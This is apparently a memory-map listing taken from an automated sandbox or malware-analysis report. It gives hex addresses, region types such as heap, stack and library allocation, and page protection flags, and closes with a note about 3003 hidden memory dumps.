|
trusted library allocation
|
page read and write
|
||
22BF851C000
|
heap
|
page read and write
|
||
1B91D000
|
stack
|
page read and write
|
||
2DE0000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF7C0F000
|
heap
|
page read and write
|
||
1B520000
|
trusted library allocation
|
page read and write
|
||
22BF85D4000
|
heap
|
page read and write
|
||
2D90000
|
trusted library allocation
|
page read and write
|
||
7FF887D80000
|
trusted library allocation
|
page read and write
|
||
1B4C0000
|
trusted library allocation
|
page read and write
|
||
22BF7E38000
|
unkown
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1B760000
|
trusted library allocation
|
page read and write
|
||
2746C717000
|
trusted library allocation
|
page read and write
|
||
1B07FE05000
|
heap
|
page read and write
|
||
1BC60000
|
trusted library allocation
|
page read and write
|
||
24A2E540000
|
heap
|
page read and write
|
||
22BF7C0F000
|
heap
|
page read and write
|
||
1AA70000
|
trusted library allocation
|
page read and write
|
||
22BF7C28000
|
heap
|
page read and write
|
||
22BF7A07000
|
heap
|
page read and write
|
||
23D22ABC000
|
heap
|
page read and write
|
||
7FF887B36000
|
trusted library allocation
|
page execute and read and write
|
||
1BA60000
|
trusted library allocation
|
page read and write
|
||
1BC60000
|
direct allocation
|
page read and write
|
||
7FF887DDC000
|
trusted library allocation
|
page read and write
|
||
7FF887A12000
|
trusted library allocation
|
page read and write
|
||
1CB496C5000
|
heap
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
22BF7AA4000
|
heap
|
page read and write
|
||
2745C250000
|
heap
|
page read and write
|
||
1E87A1AE000
|
heap
|
page read and write
|
||
2B56000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1E87A1A0000
|
heap
|
page read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
22BF85BC000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
1BB70000
|
trusted library allocation
|
page read and write
|
||
22BF7A27000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1B4E0000
|
trusted library allocation
|
page read and write
|
||
27474CB7000
|
heap
|
page read and write
|
||
7FF887BE2000
|
trusted library allocation
|
page read and write
|
||
22BF85A4000
|
heap
|
page read and write
|
||
7FF887DB0000
|
trusted library allocation
|
page read and write
|
||
1AF0B000
|
stack
|
page read and write
|
||
5F2F000
|
stack
|
page read and write
|
||
49C0000
|
heap
|
page read and write
|
||
44D2B3A000
|
stack
|
page read and write
|
||
1B570000
|
trusted library allocation
|
page read and write
|
||
1B000020000
|
trusted library allocation
|
page read and write
|
||
7FF887D50000
|
trusted library allocation
|
page read and write
|
||
BFB000
|
heap
|
page read and write
|
||
22BF7A40000
|
heap
|
page read and write
|
||
22BF79F9000
|
heap
|
page read and write
|
||
2A5A9030000
|
heap
|
page read and write
|
||
22BF859C000
|
heap
|
page read and write
|
||
22BF8584000
|
heap
|
page read and write
|
||
1B9C0000
|
trusted library allocation
|
page read and write
|
||
22BF7A9E000
|
heap
|
page read and write
|
||
1020000
|
trusted library allocation
|
page read and write
|
||
5AB2DFF000
|
stack
|
page read and write
|
||
1E87A1AA000
|
heap
|
page read and write
|
||
331F000
|
stack
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
22BF58B9000
|
heap
|
page read and write
|
||
1CB4B0C0000
|
heap
|
page read and write
|
||
1AA70000
|
trusted library allocation
|
page read and write
|
||
1ADAE000
|
heap
|
page read and write
|
||
FCE000
|
stack
|
page read and write
|
||
228A000
|
heap
|
page read and write
|
||
A4890FE000
|
stack
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
2703000
|
heap
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
1B010361000
|
trusted library allocation
|
page read and write
|
||
24A2E340000
|
heap
|
page read and write
|
||
1AE20000
|
trusted library allocation
|
page read and write
|
||
A708FBE000
|
stack
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF7AA0000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
22BF7A2F000
|
heap
|
page read and write
|
||
1B550000
|
trusted library allocation
|
page read and write
|
||
22BF851C000
|
heap
|
page read and write
|
||
2746C6F8000
|
trusted library allocation
|
page read and write
|
||
69F000
|
unkown
|
page write copy
|
||
22BF7C83000
|
heap
|
page read and write
|
||
7FF887A3B000
|
trusted library allocation
|
page execute and read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
22BF7C37000
|
heap
|
page read and write
|
||
2600000
|
heap
|
page read and write
|
||
22BF8584000
|
heap
|
page read and write
|
||
2B5E000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
22BF8534000
|
heap
|
page read and write
|
||
2BA0000
|
heap
|
page execute and read and write
|
||
7FF887D60000
|
trusted library allocation
|
page read and write
|
||
22BF7C1F000
|
heap
|
page read and write
|
||
22BF7C1F000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF7C27000
|
heap
|
page read and write
|
||
7FF887C40000
|
trusted library allocation
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
22BF85BC000
|
heap
|
page read and write
|
||
1B9A0000
|
trusted library allocation
|
page read and write
|
||
22BF7B4E000
|
heap
|
page read and write
|
||
2601000
|
heap
|
page read and write
|
||
1A3C0000
|
trusted library allocation
|
page read and write
|
||
23D20D80000
|
heap
|
page read and write
|
||
D2E000
|
heap
|
page read and write
|
||
1AC70000
|
trusted library allocation
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF7C7D000
|
heap
|
page read and write
|
||
7FF887DA3000
|
trusted library allocation
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
1AB20000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
22BF85EC000
|
heap
|
page read and write
|
||
1C580000
|
unkown
|
page read and write
|
||
1BBBA000
|
trusted library allocation
|
page read and write
|
||
1CB4C7BD000
|
trusted library allocation
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1AC4C000
|
heap
|
page read and write
|
||
7FF887C22000
|
trusted library allocation
|
page read and write
|
||
1C580000
|
unkown
|
page read and write
|
||
2DF0000
|
trusted library allocation
|
page read and write
|
||
22BF8513000
|
heap
|
page read and write
|
||
7FF887D53000
|
trusted library allocation
|
page read and write
|
||
1AADB160000
|
heap
|
page read and write
|
||
7FF887D88000
|
trusted library allocation
|
page read and write
|
||
351F000
|
stack
|
page read and write
|
||
23D22AA1000
|
heap
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
2618000
|
heap
|
page read and write
|
||
2745A80B000
|
heap
|
page read and write
|
||
22BF7A03000
|
heap
|
page read and write
|
||
22BF85E4000
|
heap
|
page read and write
|
||
1AC11000
|
heap
|
page read and write
|
||
1AB10000
|
trusted library allocation
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
597C000
|
heap
|
page read and write
|
||
22BF7C47000
|
heap
|
page read and write
|
||
22BF7C6A000
|
heap
|
page read and write
|
||
1AC18000
|
heap
|
page read and write
|
||
2745C220000
|
heap
|
page read and write
|
||
36FF000
|
stack
|
page read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
1CB5B0E1000
|
trusted library allocation
|
page read and write
|
||
A48A20D000
|
stack
|
page read and write
|
||
7FF717700000
|
unkown
|
page readonly
|
||
22BF7A03000
|
heap
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
1B820000
|
heap
|
page read and write
|
||
7FF887BF0000
|
trusted library allocation
|
page execute and read and write
|
||
23D229C6000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1CB6345B000
|
heap
|
page read and write
|
||
1E0F000
|
stack
|
page read and write
|
||
22BF8524000
|
heap
|
page read and write
|
||
1AB50000
|
trusted library allocation
|
page read and write
|
||
2934000
|
heap
|
page read and write
|
||
59ED000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
23D2100C000
|
unkown
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
22BF7A03000
|
heap
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
1BBA0000
|
trusted library allocation
|
page read and write
|
||
1BC00000
|
trusted library allocation
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
7FF887BC0000
|
trusted library allocation
|
page read and write
|
||
22BF7C77000
|
heap
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
2B37000
|
heap
|
page read and write
|
||
22BF7C27000
|
heap
|
page read and write
|
||
22BF7C58000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF85B4000
|
heap
|
page read and write
|
||
1B018705000
|
heap
|
page read and write
|
||
1BA0F000
|
trusted library allocation
|
page read and write
|
||
2742000
|
trusted library allocation
|
page read and write
|
||
1B9D0000
|
trusted library allocation
|
page read and write
|
||
7FF887ADC000
|
trusted library allocation
|
page execute and read and write
|
||
22BF7C68000
|
heap
|
page read and write
|
||
22BF8509000
|
heap
|
page read and write
|
||
7FF887BC0000
|
trusted library allocation
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
22BF7C70000
|
heap
|
page read and write
|
||
7DF431874000
|
unkown
|
page read and write
|
||
22BF7A2C000
|
heap
|
page read and write
|
||
7FF887E10000
|
trusted library allocation
|
page read and write
|
||
22BF8534000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF7C75000
|
heap
|
page read and write
|
||
A708A7E000
|
stack
|
page read and write
|
||
59F0000
|
heap
|
page read and write
|
||
160000
|
heap
|
page read and write
|
||
1B8AD000
|
stack
|
page read and write
|
||
22BF85CC000
|
heap
|
page read and write
|
||
2415000
|
trusted library allocation
|
page read and write
|
||
1B560000
|
trusted library allocation
|
page read and write
|
||
12DB1000
|
trusted library allocation
|
page read and write
|
||
22BF8535000
|
heap
|
page read and write
|
||
22BF86FA000
|
heap
|
page read and write
|
||
22BF85EC000
|
heap
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
2923000
|
heap
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
1B930000
|
trusted library allocation
|
page read and write
|
||
1ACE0000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
22BF7A9B000
|
heap
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
22BF7A71000
|
heap
|
page read and write
|
||
22BF7C38000
|
heap
|
page read and write
|
||
1B7C0000
|
trusted library allocation
|
page read and write
|
||
7FF9080E0000
|
direct allocation
|
page execute and read and write
|
||
1AB4F000
|
trusted library allocation
|
page read and write
|
||
1AC9A000
|
heap
|
page read and write
|
||
1CB63660000
|
heap
|
page read and write
|
||
7FF887A20000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
59F3000
|
heap
|
page read and write
|
||
1ACAB000
|
heap
|
page read and write
|
||
22BF851C000
|
heap
|
page read and write
|
||
22BF79F9000
|
heap
|
page read and write
|
||
22BF85BC000
|
heap
|
page read and write
|
||
1AC9E000
|
heap
|
page read and write
|
||
1CB49410000
|
heap
|
page read and write
|
||
1CB4AF62000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
7FF887CE0000
|
trusted library allocation
|
page read and write
|
||
2745E31E000
|
trusted library allocation
|
page read and write
|
||
22BF7C48000
|
heap
|
page read and write
|
||
22BF7A28000
|
heap
|
page read and write
|
||
22BF79FB000
|
heap
|
page read and write
|
||
26A9000
|
trusted library allocation
|
page read and write
|
||
7FF887A30000
|
trusted library allocation
|
page read and write
|
||
2745A80D000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
22BF7C4F000
|
heap
|
page read and write
|
||
1B9E0000
|
trusted library allocation
|
page read and write
|
||
22BF7A40000
|
heap
|
page read and write
|
||
22BF85EC000
|
heap
|
page read and write
|
||
22BF79F9000
|
heap
|
page read and write
|
||
1B900000
|
trusted library allocation
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
22BF7C1F000
|
heap
|
page read and write
|
||
2745DEBC000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1B7E0000
|
trusted library allocation
|
page read and write
|
||
A4895B9000
|
stack
|
page read and write
|
||
1AB53000
|
trusted library allocation
|
page read and write
|
||
22BF7C80000
|
heap
|
page read and write
|
||
A48927E000
|
stack
|
page read and write
|
||
25A0000
|
trusted library allocation
|
page read and write
|
||
22BF7C83000
|
heap
|
page read and write
|
||
7DF470100000
|
trusted library allocation
|
page execute and read and write
|
||
1AC8C000
|
heap
|
page read and write
|
||
22BF7A03000
|
heap
|
page read and write
|
||
22BF85EC000
|
heap
|
page read and write
|
||
1CB495F0000
|
trusted library allocation
|
page read and write
|
||
1B6C0000
|
trusted library allocation
|
page read and write
|
||
A48973E000
|
stack
|
page read and write
|
||
7FF887E90000
|
trusted library allocation
|
page read and write
|
||
1BB80000
|
trusted library allocation
|
page read and write
|
||
24A2CA30000
|
heap
|
page read and write
|
||
1AF2A000
|
heap
|
page read and write
|
||
22BF7C58000
|
heap
|
page read and write
|
||
59F9000
|
heap
|
page read and write
|
||
1ACA4000
|
heap
|
page read and write
|
||
22BF7AAC000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1B34D000
|
stack
|
page read and write
|
||
1AB60000
|
trusted library allocation
|
page read and write
|
||
1E879DF0000
|
heap
|
page read and write
|
||
22BF7A06000
|
heap
|
page read and write
|
||
22BF7AB8000
|
heap
|
page read and write
|
||
22BF859C000
|
heap
|
page read and write
|
||
1AB43000
|
trusted library allocation
|
page read and write
|
||
1CB4952E000
|
heap
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
1AB70000
|
trusted library allocation
|
page read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
||
7FF887B90000
|
trusted library allocation
|
page execute and read and write
|
||
1AB40000
|
trusted library allocation
|
page read and write
|
There are 3003 hidden memdumps, click here to show them.